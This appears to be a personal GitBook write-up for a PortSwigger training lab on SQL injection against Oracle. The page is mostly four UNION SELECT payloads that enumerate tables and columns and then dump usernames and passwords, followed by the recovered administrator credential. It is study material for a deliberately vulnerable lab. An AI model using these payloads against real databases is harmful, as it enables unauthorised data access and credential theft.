Leunam's PortSwigger
  • 01 SQL Injection
    • 01 Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
    • 02 Lab: SQL injection vulnerability allowing login bypass
    • 04 Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
    • 05 Lab: SQL injection attack, listing the database contents on non-Oracle databases
    • 06 Lab: SQL injection attack, listing the database contents on Oracle
    • 11 Lab: Blind SQL injection with conditional responses
    • 12 Lab: Blind SQL injection with conditional errors
    • 13 Lab: Visible error-based SQL injection
    • 14 Lab: Blind SQL injection with time delays
  • 02 Cross-site scripting
    • 03 Lab: DOM XSS in document.write sink using source location.search inside a select element
    • 04 Lab: DOM XSS in innerHTML sink using source location.search
    • 06 Lab: DOM XSS in jQuery selector sink using a hashchange event
    • 07 Lab: Reflected XSS into attribute with angle brackets HTML-encoded
    • 08 Lab: Stored XSS into anchor href attribute with double quotes HTML-encoded
    • 09 Lab: Reflected XSS into a JavaScript string with angle brackets HTML encoded
    • 22 Lab: Exploiting cross-site scripting to steal cookies
    • 24 Lab: Exploiting XSS to bypass CSRF defenses
  • 03 CSRF
    • 01 Lab: CSRF vulnerability with no defenses
  • 04 Clickjacking
    • 01 Lab: Basic clickjacking with CSRF token protection
    • 02 Lab: Clickjacking with form input data prefilled from a URL parameter
    • 03 Lab: Clickjacking with a frame buster script
  • 06 CORS
    • 01 Lab: CORS vulnerability with basic origin reflection
  • 10 OS Comand Injection
    • 02 Lab: Blind OS command injection with time delays
    • 03 Lab: Blind OS command injection with output redirection
  • 12 Path traversal
    • 01 Lab: File path traversal, simple case
  • 13 Access Control Vulnerability
    • 01 Lab: Unprotected admin functionality
    • 03 Lab: User role controlled by request parameter
    • 04 Lab User role can be modified in user profile 17efab5460ec808c8da6e67d210bf5a2
    • 05 Lab: User ID controlled by request parameter
    • 07 Lab: User ID controlled by request parameter with data leakage in redirect
    • 09 Lab: Insecure direct object references
  • 14 Authentication
    • 01 Lab: Username enumeration via different responses
    • 02 Lab: 2FA simple bypass
    • 03 Lab: Password reset broken logic
  • 15 WebSockets
    • 01 Lab: Manipulating WebSocket messages to exploit vulnerabilities
  • 16 Web cache deception
    • 01 Lab: Exploiting path mapping for web cache deception
  • 20 HTTP Host header attacks
    • 02 Lab: Host header authentication bypass
  • 22 File Upload vulnerabilities
    • 02 Lab Web shell upload via path traversal 17efab5460ec801980d1fa9a1e9e0b67
    • 03 Lab: Web shell upload via path traversal
  • 28 NoSQL Injection
    • 01 Lab Detecting NoSQL injection 17efab5460ec80e19ec7ee42c9d3a627
    • 02 Lab: Exploiting NoSQL injection to extract data
    • 04 Lab: Exploiting NoSQL operator injection to extract unknown fields
  • 29 API Testing
    • 01 Lab: Exploiting server-side parameter pollution in a query string
Powered by GitBook
On this page
  1. 01 SQL Injection

06 Lab: SQL injection attack, listing the database contents on Oracle

Previous05 Lab: SQL injection attack, listing the database contents on non-Oracle databasesNext11 Lab: Blind SQL injection with conditional responses

Last updated 3 months ago

'+UNION+SELECT+'AA',+'BB'+FROM+dual--
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
'+UNION+SELECT+column_name,+NULL+FROM+all_tab_columns+WHERE+table_name='USERS_OCLMMJ'--
'+UNION+SELECT+USERNAME_BYKKMI,+PASSWORD_PPNOZW+FROM+USERS_OCLMMJ--

USERS_OCLMMJ

administrator
5gz1g76gbcmpjgycii2c
Untitled
Untitled
Untitled